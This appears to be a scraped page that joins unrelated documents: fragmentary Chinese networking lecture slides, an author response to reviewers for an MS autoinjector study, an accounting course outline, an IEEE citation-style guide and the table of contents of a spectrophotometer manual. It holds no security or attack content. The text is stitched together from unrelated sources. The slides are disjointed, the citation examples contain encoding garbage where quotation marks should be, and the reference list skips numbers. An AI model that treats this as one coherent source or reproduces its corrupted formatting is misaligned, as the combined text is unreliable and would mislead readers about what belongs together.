ch1-5-textbook_content

合集下载

CH1-5ed 概述

CH1-5ed 概述
Shangdong Insititute of Business and Technology
第 1 章 概述(续)
1.4 计算机网络在我国的发展 1.5 计算机网络的类别 1.5.1 计算机网络的定义 1.5.2 几种不同类别的网络 1.6 计算机网络的性能 1.6.1 计算机网络的性能指标 1.6.2 计算机网络的非性能特征
Shangdong Insititute of Business and Technology
因特网的边缘部分与核心部分
因特网的边缘部分 主机 路由器 网络
因特网的核心部分
1.3.1 因特网的边缘部分



处在因特网边缘的部分就是连接在因特 网上的所有的主机。这些主机又称为端 系统(end system)。 “主机 A 和主机 B 进行通信”,实际上 是指:“运行在主机 A 上的某个程序和 运行在主机 B 上的另一个程序进行通 信”。 即“主机 A 的某个进程和主机 B 上的另 一个进程进行通信”。或简称为“计算 机之间通信”
Shangdong Insititute of Business and Technology
1.2.3 关于因特网的标准化工作
因特网协会 ISOC 因特网体系结构 研究委员会 IAB 因特网研究部 IRTF 因特网研究指导小组 IRSG …
因特网工程部 IETF
因特网工程指导小组 IESG
… 领域 领域 WG … WG WG … WG
Shangdong Insititute of Business and Technology
1. 客户服务器方式



客户(client)和服务器(server)都是指通信 中所涉及的两个应用进程。 客户服务器方式所描述的是进程之间服 务和被服务的关系。 客户是服务的请求方,服务器是服务的 提供方。

An open-label, multicenter study to evaluate the s

An open-label, multicenter study to evaluate the s

Author's response to reviewsTitle:An open-label,multicenter study to evaluate the safe and effective use of the single-use autoinjector with an AVONEX(R)prefilled syringe in multiple sclerosis subjectsAuthors:J.Theodore Phillips(*****************************)Edward Fox(******************)William Grainger(***********************)Dianne Tuccillo(******************************)Shifang Liu(**************************)Aaron Deykin(***************************)Version:2Date:16September2011Author's response to reviews:see overSeptember 16, 2011Dr. Thomas F. ScottAssociate EditorBMC NeurologyDear Dr. Scott and members of the BMC Neurology editorial board,Thank you for considering the manuscript: “An open-label, multicenter study to evaluate the safe and effective use of the single-use autoinjector with an AVONEX® prefilled syringe in multiple sclerosis subjects” submitted for publication. We appreciate the opportunity to revise the manuscript based on the comments made by the reviewers.Below please find responses (in bold) to comments from each reviewer.Reviewer 11. Article is good if the needle size of the comparator was exactly the same, therefore must specify the gauge and length of comparator needle. If the needle differed, a significant rewrite or revision of conclusions is needed. MUST state size of needle used on the prefilled syringe that the auto-injector was compared to, MUST revise commentary extensively if size other than exact same size used as longer or larger bore needle could account for outcome.In the Methods section we have added a description and explanation of needle size for the first injection which used the manual method to administer treatment with the prefilled syringe. In the Discussion section we have also addressed the potential size difference in the needles.Reviewer 21. In Table 2, under Injection, the first column states "Applies firm downward pressure on the body of the prefilled pen and releases the safety lock and fires device by" (rest of the caption is missing)We have added in the missing phrase in Table 2.2. Please clarify, were patients told what each number on the preference score scale denotes? In other words, what exactly does a score of 6 or a score of 7 mean? If so, what did the numbers denote?In the Methods section we have added a sentence to explain that patients were not provided information on what each number of the scale denoted.We hope that these revisions make the manuscript acceptable for publication in BMC Neurology. Thank you for your consideration of the manuscript and we look forward to hearing from you. Sincerely,Aaron Deykin, M.D., on behalf of the authors.Corresponding author: Aaron Deykin, M.D., Director, Multiple Sclerosis Clinical Development. Biogen Idec, Inc. 14 Cambridge Center, Cambridge, MA 02142. phone: 617-914-6374, email:***************************。

资料:pathway会计学大纲 新

资料:pathway会计学大纲 新

SUBJECT OUTLINE15575024 BACC001Accounting for businessLecture: All teachers in Accounting Department, SILCStudent Level:Degree student in sophomore classCredit Points: 6 pointsDelivery Time:Term1, 2015-2016Prerequisite:NileTextbook Information:Walter T Harrison, Charles Horngren, Bill Thomas, Themin Suwardy,Financial accounting: International Financail Reporting Standards. Pearson. Ninth global edition.Subject Description:This subject equips students with the broad and basic knowledge and skills to deal with accounting information systems in the business environment and is also a foundation for further study in accounting.The content is structured into 10 weekly lecture and tutorial sessions covering the following topics:1: Conceptual Framework and Financial statements2: Recording accounting transactions3: Accrual Accounting and Adjusting Entries4. Presentation of Financial statements5: Internal control, cash, and Receivables.6: Inventory and Merchandizing Operations7: PPE and Intangibles8: Liabilities9: Shareholders ‘Equity10: Statement of cash flows11: Financial statement analysisSubject Learning Objectives:On successful completion of this subject, students should be able to (SLO):1. Appraise the role of accountants and accounting information in the businessenvironment. (SLO1 ~ PLO1.1)2. Apply accounting information in external and internal decision contexts of abusiness. (SLO2 ~ PLO1.1)3. Demonstrate analytical skills needed to process accounting information;prepare internal and external financial statements and be able to interpretaccounting reports. (SLO3 ~ PLO1.1)4. Evaluate basic business and accounting information provided in popularbusiness cases. (SLO4 ~ PLO1.1)5. Effectively understand and communicate accounting information in a businesscontext. (SLO5 ~ PLO1.1)This subject covers the following Program Learning Objectives (PLOs):1. Show an understanding of essential concepts of business and related professions. (PLO 1.1)Contribution to graduate attribute:This subject equips students with the broad and basic knowledge and skills to deal with accounting information systems in the business environment and is also a foundation for further study in accounting.it focuses on the development of a vocationally relevant understanding of accounting and equips students with professional skills. It aims to develop students’theoretical and practical knowledge of business, analytical and technical skills, and attributes as a capable student of business and ethical member of society.Teaching & Learning Methodology:The subject is taught in lectures and tutorials. The lectures provide the structure of the topic area, discussion of the theory and some practical examples. Tutorials provide an opportunity to discuss ideas, ethical issues and make practical application of the theory. The tutorial is not meant to be a forum for teachers to pro vide students with “Model answers.” Tutorials are focused on helping students to solve problems they have encountered and on applying concepts introduced in the previous lecture. Students are invited to ask questions and contribute to their own clarification of the materials being studied.Students Activities (Course Content & Progress):Week Lecture topic Tutorial topicLecturedelivered Tutorial tasks and skill developmentTutordelivered1 C h1ConceptualFrameworkandFinancialstatements Ch1E1-18A/19A/20A/21A/22A/23A•Quiz p43 (40-54)E1-24A/25A/26A/27A•understanding , analysis andapplication of accounting knowledge2 Ch2Recordingaccountingtransactions Ch2E2-15A/16A/17A/18A/19A/20A/21A•QUIZ P109 (40-59)•E2-22A/23A/24A•understanding , analysis andapplication of accounting knowledge3 Ch3Accrualaccounting andadjusting entries Ch3E3-20A/21A/22A/23A/24A/25A•QUIZ P191 (45-60)•E3-26A/27A/28A/29A•understanding , analysis andapplication of accounting knowledge4 Ch5Internalcontrol, cash,andReceivables Ch5E5-23A/25A/26A/27A/28A•QUIZ P335(51-60)•E5-29A/30A/31A•understanding , analysis andapplication of accounting knowledge4Assignment 1 Due •5 NationalHoliday•6 Ch6Inventory andMerchandizingOperationsCh6E6-16A/17A/18A/19A/20A/21A/22A/23A•QUIZ P397(43-59)E6-24A/25A/26A/27A•understanding , analysis andapplication of accounting knowledge6 Mid-term Exam •CH1/2/3/57 CH7PPE andIntangiblesCH7E7-15A/16A/17A/18A/19A/20A/21A/22AQUIZ (P469) (47-61)E7-23A/24A/25A/26A/27A/28A•understanding , analysis andapplication of accounting knowledge8 CH9Liabilities CH9E9-17A/19A22A/23A/24A/25A/26A/27AQUIZ P593(51-69)E9-28A/29A/30A/31A•understanding , analysis andapplication of accounting knowledge8 Assignment 2Due•9 CH10ShareholdersEquity CH10E10-20A/21A/22A/23A/24A/25A/26A/27A/28AQUIZ P655 (56-75)E10-29A/30A/31A/32A/33A/34A/35A•understanding , analysis andapplication of accounting knowledge10 Review •Assessment Methods in Alignment with PLOs:Assessment Types Weight SLOsCoveredPLOsCoveredTaskstructureAssess Due date1 Assignment1&220% SLO1-5 PLO1.1 Individual Week4&82 Mid-termexam20% SLO1-5 PLO1.1 Individual Week63 Final Exam 60% SLO1-5 PLO1.1 Individual Exam Week Minimum Requirements:Students must achieve at least 60% of the subject’s total marks Students must also attend 80% of tutorial workshops.Reading List and References:(1)Recommended texts会计学,陈信元,上海财经大学出版社管理会计,余绪缨编著,中国人民大学出版社Tyler, J, Accounting Study Guide, 5th edition, Pearson Education Australia, ISBN 978-0-7339-7869-2 (available with the textbook), 2007CPA Australia or The Institute of Chartered Accountants in Australia (2009), Accounting Handbook 2009, Sydney: Prentice Hall or John WileyCPA Australia or the Institute of Chartered Accountants in Australia (2009), Auditing and Assurance Handbook 2009, Sydney: Prentice Hall or John WileyHoggett, J., and Edwards, L., Medlin, J. (2006), Accounting in Australia (6th Ed.), Brisbane: John Wiley & SonsKimmel, P. D., Carlon, S., Loftus, J., Mladenovic, R., Kieso, D. E., Weygandt, J. J. (2006), Accounting: Building Business Skills (2nd Ed.), Brisbane: John Wiley & SonsTrotman, K., Gibbins, M. (2005) Financial Accounting: An Integrated Approach (3rd Ed.), Thomson PublishersJackling, B., Raar, J., Williams, B., Wines, G. (2007), Accounting: A framework for decision making (2nd Ed.), McGraw-Hill IrwinJuchau, R. Flanagan, J., Mitchell, G., Tibbits, G., Ingram, R., Albright, T., Baldwin, B., Hill, J. (2006) Accounting: Information for Decisions (2nd Ed.), Thomson Publishers(2)Journals and Business Publications会计研究管理世界上海证券报中国财政部新会计准则International Financial Reporting Systems(IFRS)GAAP(Generally Accepted Accounting Principles, American)AccountancyAccounting & FinanceAccounting ReviewAccounting ResearchAccounting HorizonJournal of FinanceAccounting & Business ResearchThe Australian AccountantAustralian Accounting ReviewCA MagazineCost & ManagementJournal of Accounting and EconomicsThe Journal of AccountancyBusiness Review WeeklyHarvard Business ReviewAustralian Financial ReviewSydney Morning HeraldBusiness Reports on Free-to-air Nightly News Programs。

ch1_signals and signal processing

ch1_signals and signal processing
Ch1 Signals and Signal Processing
Outline
Characterization and Classification of Signals Typical Signal Processing Operations Examples of Typical Signals and Signal Processing Applications Why Digital Signal Processing? DSP Application Systems

The Digitalization Determine Future
Digital switchers replaced analog switchers GSM and CDMA replaced analog mobile communication Digital cameras come out… Digital TVs are replacing analog TVs Thoroughly saying, the technology based on computer is changing the industry, agriculture, education, science…
Examples of Typical Signal Processing Applications
Sound recording applications. Compressors and limiters. Expanders and noise gates. Equalizers and filters. Noise reduction system. Delay and reverberation systems. ……

IEEE参考文献格式

IEEE参考文献格式

•Creating a reference list or bibliographyA numbered list of references must be provided at the end of thepaper. The list should be arranged in the order of citation in the text of the assignment or essay, not in alphabetical order. List only one reference per reference number. Footnotes or otherinformation that are not part of the referencing format should not be included in the reference list.The following examples demonstrate the format for a variety of types of references. Included are some examples of citing electronic documents. Such items come in many forms, so only some examples have been listed here.Print DocumentsBooksNote: Every (important) word in the title of a book or conference must be capitalised. Only the first word of a subtitle should be capitalised. Capitalise the "v" in Volume for a book title.Punctuation goes inside the quotation marks.Standard formatSingle author[1] W.-K. Chen, Linear Networks and Systems. Belmont, CA: Wadsworth,1993, pp. 123-135.[2] S. M. Hemmington, Soft Science. Saskatoon: University ofSaskatchewan Press, 1997.Edited work[3] D. Sarunyagate, Ed., Lasers. New York: McGraw-Hill, 1996.Later edition[4] K. Schwalbe, Information Technology Project Management, 3rd ed.Boston: Course Technology, 2004.[5] M. N. DeMers, Fundamentals of Geographic Information Systems,3rd ed. New York : John Wiley, 2005.More than one author[6] T. Jordan and P. A. Taylor, Hacktivism and Cyberwars: Rebelswith a cause? London: Routledge, 2004.[7] U. J. Gelinas, Jr., S. G. Sutton, and J. Fedorowicz, Businessprocesses and information technology. Cincinnati:South-Western/Thomson Learning, 2004.Three or more authorsNote: The names of all authors should be given in the references unless the number of authors is greater than six. If there are more than six authors, you may use et al. after the name of the first author.[8] R. Hayes, G. Pisano, D. Upton, and S. Wheelwright, Operations,Strategy, and Technology: Pursuing the competitive edge.Hoboken, NJ : Wiley, 2005.Series[9] M. Bell, et al., Universities Online: A survey of onlineeducation and services in Australia, Occasional Paper Series 02-A. Canberra: Department of Education, Science andTraining, 2002.Corporate author (ie: a company or organisation)[10] World Bank, Information and Communication Technologies: AWorld Bank group strategy. Washington, DC : World Bank, 2002.Conference (complete conference proceedings)[11] T. J. van Weert and R. K. Munro, Eds., Informatics and theDigital Society: Social, ethical and cognitive issues: IFIP TC3/WG3.1&3.2 Open Conference on Social, Ethical andCognitive Issues of Informatics and ICT, July 22-26, 2002, Dortmund, Germany. Boston: Kluwer Academic, 2003.Government publication[12] Australia. Attorney-Generals Department. Digital AgendaReview, 4 Vols. Canberra: Attorney- General's Department,2003.Manual[13] Bell Telephone Laboratories Technical Staff, TransmissionSystem for Communications, Bell Telephone Laboratories,1995.Catalogue[14] Catalog No. MWM-1, Microwave Components, M. W. Microwave Corp.,Brooklyn, NY.Application notes[15] Hewlett-Packard, Appl. Note 935, pp. 25-29.Note:Titles of unpublished works are not italicised or capitalised. Capitalise only the first word of a paper or thesis.Technical report[16] K. E. Elliott and C.M. Greene, "A local adaptive protocol,"Argonne National Laboratory, Argonne, France, Tech. Rep.916-1010-BB, 1997.Patent / Standard[17] K. Kimura and A. Lipeles, "Fuzzy controller component, " U.S. Patent 14,860,040, December 14, 1996.Papers presented at conferences (unpublished)[18] H. A. Nimr, "Defuzzification of the outputs of fuzzycontrollers," presented at 5th International Conference onFuzzy Systems, Cairo, Egypt, 1996.Thesis or dissertation[19] H. Zhang, "Delay-insensitive networks," M.S. thesis,University of Waterloo, Waterloo, ON, Canada, 1997.[20] M. W. Dixon, "Application of neural networks to solve therouting problem in communication networks," Ph.D.dissertation, Murdoch University, Murdoch, WA, Australia, 1999.Parts of a BookNote: These examples are for chapters or parts of edited works in which the chapters or parts have individual title and author/s, but are included in collections or textbooks edited by others. If the editors of a work are also the authors of all of the included chapters then it should be cited as a whole book using the examples given above (Books).Capitalise only the first word of a paper or book chapter.Single chapter from an edited work[1] A. Rezi and M. Allam, "Techniques in array processing by meansof transformations, " in Control and Dynamic Systems, Vol.69, Multidemsional Systems, C. T. Leondes, Ed. San Diego: Academic Press, 1995, pp. 133-180.[2] G. O. Young, "Synthetic structure of industrial plastics," inPlastics, 2nd ed., vol. 3, J. Peters, Ed. New York:McGraw-Hill, 1964, pp. 15-64.Conference or seminar paper (one paper from a published conference proceedings)[3] N. Osifchin and G. Vau, "Power considerations for themodernization of telecommunications in Central and Eastern European and former Soviet Union (CEE/FSU) countries," in Second International Telecommunications Energy SpecialConference, 1997, pp. 9-16.[4] S. Al Kuran, "The prospects for GaAs MESFET technology in dc-acvoltage conversion," in Proceedings of the Fourth AnnualPortable Design Conference, 1997, pp. 137-142.Article in an encyclopaedia, signed[5] O. B. R. Strimpel, "Computer graphics," in McGraw-HillEncyclopedia of Science and Technology, 8th ed., Vol. 4. New York: McGraw-Hill, 1997, pp. 279-283.Study Guides and Unit ReadersNote: You should not cite from Unit Readers, Study Guides, or lecture notes, but where possible you should go to the original source of the information. If you do need to cite articles from the Unit Reader, treat the Reader articles as if they were book or journal articles. In the reference list or bibliography use the bibliographical details as quoted in the Reader and refer to the page numbers from the Reader, not the original page numbers (unless you have independently consulted the original).[6] L. Vertelney, M. Arent, and H. Lieberman, "Two disciplines insearch of an interface: Reflections on a design problem," in The Art of Human-Computer Interface Design, B. Laurel, Ed.Reading, MA: Addison-Wesley, 1990. Reprinted inHuman-Computer Interaction (ICT 235) Readings and Lecture Notes, Vol. 1. Murdoch: Murdoch University, 2005, pp. 32-37. Journal ArticlesNote: Capitalise only the first word of an article title, except for proper nouns or acronyms. Every (important) word in the title of a journal must be capitalised. Do not capitalise the "v" in volume for a journal article.You must either spell out the entire name of each journal that you reference or use accepted abbreviations. You must consistently do one or the other. Staff at the Reference Desk can suggest sources of accepted journal abbreviations.You may spell out words such as volume or December, but you must either spell out all such occurrences or abbreviate all. You do not need to abbreviate March, April, May, June or July.To indicate a page range use pp. 111-222. If you refer to only one page, use only p. 111.Standard formatJournal articles[1] E. P. Wigner, "Theory of traveling wave optical laser," Phys.Rev., vol. 134, pp. A635-A646, Dec. 1965.[2] J. U. Duncombe, "Infrared navigation - Part I: An assessmentof feasability," IEEE Trans. Electron. Devices, vol. ED-11, pp. 34-39, Jan. 1959.[3] G. Liu, K. Y. Lee, and H. F. Jordan, "TDM and TWDM de Bruijnnetworks and shufflenets for optical communications," IEEE Trans. Comp., vol. 46, pp. 695-701, June 1997.OR[4] J. R. Beveridge and E. M. Riseman, "How easy is matching 2D linemodels using local search?" IEEE Transactions on PatternAnalysis and Machine Intelligence, vol. 19, pp. 564-579, June 1997.[5] I. S. Qamber, "Flow graph development method," MicroelectronicsReliability, vol. 33, no. 9, pp. 1387-1395, Dec. 1993.[6] E. H. Miller, "A note on reflector arrays," IEEE Transactionson Antennas and Propagation, to be published.Electronic documentsNote:When you cite an electronic source try to describe it in the same way you would describe a similar printed publication. If possible, give sufficient information for your readers to retrieve the source themselves.If only the first page number is given, a plus sign indicates following pages, eg. 26+. If page numbers are not given, use paragraph or other section numbers if you need to be specific. An electronic source may not always contain clear author or publisher details.The access information will usually be just the URL of the source. As well as a publication/revision date (if there is one), the date of access is included since an electronic source may change between the time you cite it and the time it is accessed by a reader.E-BooksStandard format[1] L. Bass, P. Clements, and R. Kazman. Software Architecture inPractice, 2nd ed. Reading, MA: Addison Wesley, 2003. [E-book] Available: Safari e-book.[2] T. Eckes, The Developmental Social Psychology of Gender. MahwahNJ: Lawrence Erlbaum, 2000. [E-book] Available: netLibrary e-book.Article in online encyclopaedia[3] D. Ince, "Acoustic coupler," in A Dictionary of the Internet.Oxford: Oxford University Press, 2001. [Online]. Available: Oxford Reference Online, .[Accessed: May 24, 2005].[4] W. D. Nance, "Management information system," in The BlackwellEncyclopedic Dictionary of Management Information Systems,G.B. Davis, Ed. Malden MA: Blackwell, 1999, pp. 138-144.[E-book]. Available: NetLibrary e-book.E-JournalsStandard formatJournal article abstract accessed from online database[1] M. T. Kimour and D. Meslati, "Deriving objects from use casesin real-time embedded systems," Information and SoftwareTechnology, vol. 47, no. 8, p. 533, June 2005. [Abstract].Available: ProQuest, /proquest/.[Accessed May 12, 2005].Note: Abstract citations are only included in a reference list if the abstract is substantial or if the full-text of the article could not be accessed.Journal article from online full-text databaseNote: When including the internet address of articles retrieved from searches in full-text databases, please use the Recommended URLs for Full-text Databases, which are the URLs for the main entrance to the service and are easier to reproduce.[2] H. K. Edwards and V. Sridhar, "Analysis of software requirementsengineering exercises in a global virtual team setup,"Journal of Global Information Management, vol. 13, no. 2, p.21+, April-June 2005. [Online]. Available: Academic OneFile, . [Accessed May 31, 2005].[3] A. Holub, "Is software engineering an oxymoron?" SoftwareDevelopment Times, p. 28+, March 2005. [Online]. Available: ProQuest, . [Accessed May 23, 2005].Journal article in a scholarly journal (published free of charge on the internet)[4] A. Altun, "Understanding hypertext in the context of readingon the web: Language learners' experience," Current Issues in Education, vol. 6, no. 12, July 2003. [Online]. Available: /volume6/number12/. [Accessed Dec. 2, 2004].Journal article in electronic journal subscription[5] P. H. C. Eilers and J. J. Goeman, "Enhancing scatterplots withsmoothed densities," Bioinformatics, vol. 20, no. 5, pp.623-628, March 2004. [Online]. Available:. [Accessed Sept. 18, 2004].Newspaper article from online database[6] J. Riley, "Call for new look at skilled migrants," TheAustralian, p. 35, May 31, 2005. Available: Factiva,. [Accessed May 31, 2005].Newspaper article from the Internet[7] C. Wilson-Clark, "Computers ranked as key literacy," The WestAustralian, para. 3, March 29, 2004. [Online]. Available:.au. [Accessed Sept. 18, 2004].Internet DocumentsStandard formatProfessional Internet site[1] European Telecommunications Standards Institute, 揇igitalVideo Broadcasting (DVB): Implementation guidelines for DVBterrestrial services; transmission aspects,?EuropeanTelecommunications Standards Institute, ETSI TR-101-190,1997. [Online]. Available: . [Accessed:Aug. 17, 1998].Personal Internet site[2] G. Sussman, "Home page - Dr. Gerald Sussman," July 2002.[Online]. Available:/faculty/Sussman/sussmanpage.htm[Accessed: Sept. 12, 2004].General Internet site[3] J. Geralds, "Sega Ends Production of Dreamcast," ,para. 2, Jan. 31, 2001. [Online]. Available:/news/1116995. [Accessed: Sept. 12,2004].Internet document, no author given[4] 揂憀ayman抯?explanation of Ultra Narrow Band technology,?Oct.3, 2003. [Online]. Available:/Layman.pdf. [Accessed: Dec. 3, 2003].Non-Book FormatsPodcasts[1] W. Brown and K. Brodie, Presenters, and P. George, Producer, 揊rom Lake Baikal to the Halfway Mark, Yekaterinburg? Peking to Paris: Episode 3, Jun. 4, 2007. [Podcast television programme]. Sydney: ABC Television. Available:.au/tv/pekingtoparis/podcast/pekingtoparis.xm l. [Accessed Feb. 4, 2008].[2] S. Gary, Presenter, 揃lack Hole Death Ray? StarStuff, Dec. 23, 2007. [Podcast radio programme]. Sydney: ABC News Radio. Available: .au/newsradio/podcast/STARSTUFF.xml. [Accessed Feb. 4, 2008].Other FormatsMicroform[3] W. D. Scott & Co, Information Technology in Australia:Capacities and opportunities: A report to the Department ofScience and Technology. [Microform]. W. D. Scott & CompanyPty. Ltd. in association with Arthur D. Little Inc. Canberra:Department of Science and Technology, 1984.Computer game[4] The Hobbit: The prelude to the Lord of the Rings. [CD-ROM].United Kingdom: Vivendi Universal Games, 2003.Software[5] Thomson ISI, EndNote 7. [CD-ROM]. Berkeley, Ca.: ISIResearchSoft, 2003.Video recording[6] C. Rogers, Writer and Director, Grrls in IT. [Videorecording].Bendigo, Vic. : Video Education Australasia, 1999.A reference list: what should it look like?The reference list should appear at the end of your paper. Begin the list on a new page. The title References should be either left justified or centered on the page. The entries should appear as one numerical sequence in the order that the material is cited in the text of your assignment.Note: The hanging indent for each reference makes the numerical sequence more obvious.[1] A. Rezi and M. Allam, "Techniques in array processing by meansof transformations, " in Control and Dynamic Systems, Vol.69, Multidemsional Systems, C. T. Leondes, Ed. San Diego: Academic Press, 1995, pp. 133-180.[2] G. O. Young, "Synthetic structure of industrial plastics," inPlastics, 2nd ed., vol. 3, J. Peters, Ed. New York:McGraw-Hill, 1964, pp. 15-64.[3] S. M. Hemmington, Soft Science. Saskatoon: University ofSaskatchewan Press, 1997.[4] N. Osifchin and G. Vau, "Power considerations for themodernization of telecommunications in Central and Eastern European and former Soviet Union (CEE/FSU) countries," in Second International Telecommunications Energy SpecialConference, 1997, pp. 9-16.[5] D. Sarunyagate, Ed., Lasers. New York: McGraw-Hill, 1996.[8] O. B. R. Strimpel, "Computer graphics," in McGraw-HillEncyclopedia of Science and Technology, 8th ed., Vol. 4. New York: McGraw-Hill, 1997, pp. 279-283.[9] K. Schwalbe, Information Technology Project Management, 3rd ed.Boston: Course Technology, 2004.[10] M. N. DeMers, Fundamentals of Geographic Information Systems,3rd ed. New York: John Wiley, 2005.[11] L. Vertelney, M. Arent, and H. Lieberman, "Two disciplines insearch of an interface: Reflections on a design problem," in The Art of Human-Computer Interface Design, B. Laurel, Ed.Reading, MA: Addison-Wesley, 1990. Reprinted inHuman-Computer Interaction (ICT 235) Readings and Lecture Notes, Vol. 1. Murdoch: Murdoch University, 2005, pp. 32-37.[12] E. P. Wigner, "Theory of traveling wave optical laser,"Physical Review, vol.134, pp. A635-A646, Dec. 1965.[13] J. U. Duncombe, "Infrared navigation - Part I: An assessmentof feasibility," IEEE Transactions on Electron Devices, vol.ED-11, pp. 34-39, Jan. 1959.[14] M. Bell, et al., Universities Online: A survey of onlineeducation and services in Australia, Occasional Paper Series 02-A. Canberra: Department of Education, Science andTraining, 2002.[15] T. J. van Weert and R. K. Munro, Eds., Informatics and theDigital Society: Social, ethical and cognitive issues: IFIP TC3/WG3.1&3.2 Open Conference on Social, Ethical andCognitive Issues of Informatics and ICT, July 22-26, 2002, Dortmund, Germany. Boston: Kluwer Academic, 2003.[16] I. S. Qamber, "Flow graph development method,"Microelectronics Reliability, vol. 33, no. 9, pp. 1387-1395, Dec. 1993.[17] Australia. Attorney-Generals Department. Digital AgendaReview, 4 Vols. Canberra: Attorney- General's Department, 2003.[18] C. Rogers, Writer and Director, Grrls in IT. [Videorecording].Bendigo, Vic.: Video Education Australasia, 1999.[19] L. Bass, P. Clements, and R. Kazman. Software Architecture inPractice, 2nd ed. Reading, MA: Addison Wesley, 2003. [E-book] Available: Safari e-book.[20] D. Ince, "Acoustic coupler," in A Dictionary of the Internet.Oxford: Oxford University Press, 2001. [Online]. Available: Oxford Reference Online, .[Accessed: May 24, 2005].[21] H. K. Edwards and V. Sridhar, "Analysis of softwarerequirements engineering exercises in a global virtual team setup," Journal of Global Information Management, vol. 13, no. 2, p. 21+, April-June 2005. [Online]. Available: AcademicOneFile, . [Accessed May 31,2005].[22] A. Holub, "Is software engineering an oxymoron?" SoftwareDevelopment Times, p. 28+, March 2005. [Online]. Available: ProQuest, . [Accessed May 23, 2005].[23] H. Zhang, "Delay-insensitive networks," M.S. thesis,University of Waterloo, Waterloo, ON, Canada, 1997.[24] P. H. C. Eilers and J. J. Goeman, "Enhancing scatterplots withsmoothed densities," Bioinformatics, vol. 20, no. 5, pp.623-628, March 2004. [Online]. Available:. [Accessed Sept. 18, 2004].[25] J. Riley, "Call for new look at skilled migrants," TheAustralian, p. 35, May 31, 2005. Available: Factiva,. [Accessed May 31, 2005].[26] European Telecommunications Standards Institute, 揇igitalVideo Broadcasting (DVB): Implementation guidelines for DVB terrestrial services; transmission aspects,?EuropeanTelecommunications Standards Institute, ETSI TR-101-190,1997. [Online]. Available: . [Accessed: Aug. 17, 1998].[27] J. Geralds, "Sega Ends Production of Dreamcast," ,para. 2, Jan. 31, 2001. [Online]. Available:/news/1116995. [Accessed Sept. 12,2004].[28] W. D. Scott & Co, Information Technology in Australia:Capacities and opportunities: A report to the Department of Science and Technology. [Microform]. W. D. Scott & Company Pty. Ltd. in association with Arthur D. Little Inc. Canberra: Department of Science and Technology, 1984.AbbreviationsStandard abbreviations may be used in your citations. A list of appropriate abbreviations can be found below:。

《计量经济学》教学大纲

《计量经济学》教学大纲

《计量经济学》教学大纲李景华编写经济学专业课程教学大纲1078 目录前言 (1082)第一章绪论 (1084)§1.1 计量经济学 (1084)一、计量经济学 (1084)二、计量经济学模型 (1084)三、计量经济学的内容体系 (1084)四、计量经济学是一门经济学科 (1085)五、计量经济学在经济学科中的地位 (1085)§1.2 建立计量经济学模型的步骤和要点 (1085)一、理论模型的设计 (1085)二、样本数据的收集 (1085)三、模型参数的估计 (1086)四、模型的检验 (1086)五、建立计量经济学模型过程中的几个关键 (1086)六、计量经济学应用软件介绍 (1086)§1.3 计量经济学模型的应用 (1086)一、经济结构分析 (1086)二、经济预测 (1087)三、经济证策评价 (1087)四、经济理论检验与发展 (1087)本章思考题 (1087)第二章经典单方程计量经济学模型:一元线性回归模型 (1089)§2.1 回归分析概述 (1089)一、回归分析基本概念 (1089)二、总体回归函数 (1089)三、随机干扰项 (1089)四、样本回归函数 (1090)§2.2 一元线性回归模型的参数估计 (1090)一、一元线性回归模型的基本假设 (1090)二、参数的普通最小二乘估计(OLS) (1090)三、参数估计的最大或然法(ML) (1090)四、最小二乘估计量的性质 (1090)五、参数估计量的概率分布及随机干扰项方差的估计 (1090)§2.3 一元线性回归模型的统计检验 (1091)一、拟合优度检验 (1091)二、变量的显著性检验 (1091)三、参数的置信区间 (1091)§2.4 一元线性回归分析的应用:预测问题 (1091)计量经济学1079一、0ˆY 是条件均值)|(0X X Y E =或个值Y 的一个无偏估计。

2800系列使用手册

2800系列使用手册

UV-2802S
0.5、1、2、4nm
≤0.15%T 在 220nm,340 nm 处 0-200%T,-0.3-2.80A, 0-9999C(0-9999F) ±0.5%T RS-232C 串口,Centronics 并口配 Hp,Epson 兼容激光,喷墨打印机 550×400×270 580×400×280 16kg 约 21kg
23仪器外观uv2800见图21图22样品室盖键盘液晶显示屏拉杆图21散热风扇电源插座打印口液晶对比度调节旋钮电源开关110v220v转换开关rs232串行通uv28022802s见图23图24图25液晶对比度调节旋钮液晶显示屏样品室盖拉杆键盘图23电源指示灯打印口电源开关rs232串行通讯口图24电源插座散热风扇散热孔110v220v转换开关换灯口盖板观察孔图2524仪器安装将仪器放置于水平平台上仪器应避免阳光直射远离电磁发射装置和大功率电气装置使用环境不能有尘埃腐蚀性气体和振动
UV-2800/2802/2802S 型
紫外可见分光光度计 用户使用手册
尤尼柯(上海)仪器有限公司
目 录 第一章 概述………………………………………………………………………………… 1. 1 原理……………………………………………………………………………………… 1. 2 用途……………………………………………………………………………………… 1. 3 特点……………………………………………………………………………………… 第二章 主要技术指标……………………………………………………………………… 2. 1 技术指标………………………………………………………………………………… 2. 2 随机附件………………………………………………………………………………… 2. 3 仪器外观………………………………………………………………………………… 2. 4 仪器安装………………………………………………………………………………… 第三章 仪器的基本操作…………………………………………………………………… 3. 1 显示屏和按键…………………………………………………………………………… 3. 2 仪器上电………………………………………………………………………………… 3. 3 仪器的基本操作………………………………………………………………………… 3. 3. 1 调空白………………………………………………………………………………… 3. 3. 2 设置波长……………………………………………………………………………… 3. 3. 3 调出, 存储, 打印实验结果………………………………………………………… 3. 4 试验前的准备…………………………………………………………………………… 第四章 光度计模式………………………………………………………………………… 4. 1 测试方法描述…………………………………………………………………………… 4. 1. 1 吸光度模式…………………………………………………………………………… 4. 1. 2 透过率模式…………………………………………………………………………… 4. 1. 3 含量 (浓度) 模式……………………………………………………………………… 4. 2 打印实验报告…………………………………………………………………………… 第五章 定量测量…………………………………………………………………………… 5. 1 测量方法描述…………………………………………………………………………… 5. 1. 1 选择浓度单位………………………………………………………………………… 5. 1. 2 选择校正方法………………………………………………………………………… 5. 1. 3 选择曲线拟合方法…………………………………………………………………… 5. 1. 4 直接输入标准曲线…………………………………………………………………… 5. 1. 5 建立标准曲线………………………………………………………………………… 5. 1. 6 定量测量……………………………………………………………………………… 第六章 光谱扫描…………………………………………………………………………… 6. 1 参数设置………………………………………………………………………………… 6. 2 扫描模式选择…………………………………………………………………………… 6. 3 建立基线………………………………………………………………………………… 6. 4 扫描样品………………………………………………………………………………… 6. 5 图谱处理………………………………………………………………………………… 6. 5. 1 改变标尺……………………………………………………………………………… 6. 5. 2 峰谷查寻……………………………………………………………………………… 6. 5. 3 存储, 调入, 打印扫描曲线………………………………………………………… 第七章 动力学测量………………………………………………………………………… 7. 1 参数设置………………………………………………………………………………… 1 1 1 1 2 2 2 3 5 5 5 6 8 8 9 10 12 12 12 13 13 13 15 15 15 15 16 16 16 17 19 21 21 21 22 22 23 23 23 24 26 